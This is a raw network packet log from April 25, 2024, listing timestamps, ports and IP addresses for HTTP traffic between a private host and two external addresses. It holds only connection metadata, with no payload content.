Apr 25, 2024 09:04:01.309883118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309916973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309937000 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310049057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310060978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310070992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310115099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310126066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310126066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310126066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310170889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310173035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310194969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310233116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310234070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310305119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310350895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310401917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310412884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310424089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310465097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310477972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310482025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310492992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310508966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310520887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310523987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310534954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310561895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310590029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310631037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310642958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310698986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310789108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310801029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310858011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310875893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310894012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.310960054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.310971022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.311006069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.311012983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.311024904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.311050892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.311094046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.311114073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.311213970 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.482170105 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 09:04:01.482280970 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 09:04:01.482470989 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 09:04:01.542908907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.542922974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.542933941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.542957067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.542993069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.542993069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.542995930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543036938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543047905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543082952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543127060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543139935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543154955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543164968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543173075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543194056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543212891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543253899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543312073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543374062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543384075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543392897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543433905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543433905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543452978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543515921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543559074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543590069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543602943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543612003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543633938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543654919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543694973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543745041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543776035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543832064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543840885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543843985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543854952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543864965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543889046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543889046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.543917894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.543978930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544008970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544032097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544049978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544060946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544090033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544126987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544137001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544178009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544197083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544245005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544254065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544296980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544307947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544336081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544387102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544398069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544409037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544447899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544447899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544467926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544504881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544517040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544570923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544581890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544595003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544616938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544639111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544692993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544693947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544735909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544755936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544799089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544856071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544867039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544878006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544917107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544928074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.544953108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.544984102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545062065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545078039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545125961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545128107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545176983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545208931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545217037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545262098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545283079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545300007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545303106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545351982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545360088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545363903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545407057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545423031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545444965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545489073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545523882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545527935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545572042 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545599937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545648098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545687914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545694113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545716047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545727968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545762062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545764923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545799017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545824051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545849085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545897007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545907974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545927048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.545943022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.545988083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546006918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546024084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546087027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546147108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546158075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546210051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546228886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546252012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546269894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546335936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546381950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546389103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546437979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546505928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546509027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546569109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546607018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546665907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546679020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546689987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546701908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546739101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546739101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546751976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546762943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546801090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546861887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546874046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546901941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.546916008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546952009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.546993017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547003031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547051907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547092915 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547094107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547106028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547188044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547199011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547202110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547240973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547266006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547318935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547358036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547379017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547389984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547425032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547457933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547470093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547528982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547560930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547607899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547666073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547669888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547682047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547739983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547749996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547750950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547775030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547799110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547818899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547862053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547869921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547883034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547904015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.547923088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.547986031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548002958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548013926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548053026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548053026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548115015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548165083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548176050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548207998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548237085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548309088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548310995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548321962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548341990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548365116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548386097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548403025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548432112 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548443079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548490047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548496008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548548937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548587084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548616886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548631907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548655987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548671007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548707008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548718929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548743010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548753023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548810959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548819065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548825979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548836946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548878908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548897982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548904896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548917055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.548929930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548985004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.548985958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549072981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549091101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549103022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549115896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549127102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549140930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549140930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549200058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549202919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549213886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549266100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549288988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549303055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549323082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549387932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549401999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549434900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549452066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549463987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549474001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549510002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549530983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549555063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549566031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549578905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549627066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549648046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549706936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549719095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549747944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549778938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549798965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549817085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549843073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549854994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549859047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549879074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549890995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549917936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.549940109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.549963951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550010920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550026894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.550045967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550065994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.550096989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550132036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550148964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.550201893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550236940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550247908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550249100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.550283909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.550298929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.550323963 CEST	80	49733	176.97.76.106	192.168.2.4
